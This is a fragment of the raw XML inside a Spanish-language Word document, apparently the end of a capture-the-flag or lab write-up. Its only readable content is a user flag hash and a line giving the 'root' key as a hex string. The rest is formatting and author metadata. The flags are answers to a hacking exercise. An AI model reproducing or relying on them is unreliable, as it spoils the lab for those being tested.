      </w:r>
      <w:r w:rsidRPr="00125FCB">
        <w:t>16d5a681eb3cf331d0d578ba8f9f1d7f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C623F8" w14:textId="77777777" w:rsidR="00051C03" w:rsidRDefault="00051C03" w:rsidP="00051C03">
      <w:r>
        <w:t xml:space="preserve">La clave de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2681D">
        <w:t>bccebe08645f2c1d0881bdb7a52b71c5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78873927" w14:textId="77777777" w:rsidR="00051C03" w:rsidRDefault="00051C03" w:rsidP="00AC6E28"/>
    <w:sectPr w:rsidR="00051C03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C7C95" w14:textId="77777777" w:rsidR="00F54E8A" w:rsidRDefault="00F54E8A" w:rsidP="00C121FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="695EA88B" w14:textId="77777777" w:rsidR="00F54E8A" w:rsidRDefault="00F54E8A" w:rsidP="00C12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680E9" w14:textId="77777777" w:rsidR="00F54E8A" w:rsidRDefault="00F54E8A" w:rsidP="00C121FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="70E4A9C6" w14:textId="77777777" w:rsidR="00F54E8A" w:rsidRDefault="00F54E8A" w:rsidP="00C12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8D1FD" w14:textId="14FD26DC" w:rsidR="00C121FA" w:rsidRDefault="006C27D8">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof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77E5DFE1" wp14:editId="7D52EE3A">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5351145</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-312420</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1181100" cy="586740"/>
          <wp:effectExtent l="0" t="0" r="0" b="3810"/>
          <wp:wrapSquare wrapText="bothSides"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58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21FA">
      <w:tab/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">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B1687"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5ACE27AE"/>
    <w:lvl w:ilvl="0" w:tplc="90FA5B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DF7E40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77D6F1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FA"/>
    <w:rsid w:val="00051C03"/>
    <w:rsid w:val="00070DAA"/>
    <w:rsid w:val="00125FCB"/>
    <w:rsid w:val="00130770"/>
    <w:rsid w:val="001359F9"/>
    <w:rsid w:val="0015440C"/>
    <w:rsid w:val="001B5438"/>
    <w:rsid w:val="001E43B5"/>
    <w:rsid w:val="002472BE"/>
    <w:rsid w:val="00255828"/>
    <w:rsid w:val="002E72C6"/>
    <w:rsid w:val="00310363"/>
    <w:rsid w:val="00354835"/>
    <w:rsid w:val="003622F6"/>
    <w:rsid w:val="003D2E45"/>
    <w:rsid w:val="00414323"/>
    <w:rsid w:val="00491DCF"/>
    <w:rsid w:val="00494C9D"/>
    <w:rsid w:val="005158A2"/>
    <w:rsid w:val="00581D82"/>
    <w:rsid w:val="005C2B54"/>
    <w:rsid w:val="005D7BF8"/>
    <w:rsid w:val="005F619A"/>
    <w:rsid w:val="00621DB1"/>
    <w:rsid w:val="00633752"/>
    <w:rsid w:val="006C27D8"/>
    <w:rsid w:val="00752282"/>
    <w:rsid w:val="0081388D"/>
    <w:rsid w:val="0082038A"/>
    <w:rsid w:val="00993072"/>
    <w:rsid w:val="0099725A"/>
    <w:rsid w:val="009D758D"/>
    <w:rsid w:val="00A25088"/>
    <w:rsid w:val="00AC6E28"/>
    <w:rsid w:val="00B2681D"/>
    <w:rsid w:val="00B43F20"/>
    <w:rsid w:val="00B537BD"/>
    <w:rsid w:val="00BC2F3C"/>
    <w:rsid w:val="00C121FA"/>
    <w:rsid w:val="00C32036"/>
    <w:rsid w:val="00D2393F"/>
    <w:rsid w:val="00D300C6"/>
    <w:rsid w:val="00D669C8"/>
    <w:rsid w:val="00D85B72"/>
    <w:rsid w:val="00DB763D"/>
    <w:rsid w:val="00F54E8A"/>
    <w:rsid w:val="00FB6292"/>
    <w:rsid w:val="00FC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5B315B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F282C986-D135-4173-B008-E293D49E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2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21FA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C12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1FA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B537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94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494C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1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292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peña marin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>camilo peña marin</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-13T20:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-13T20:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>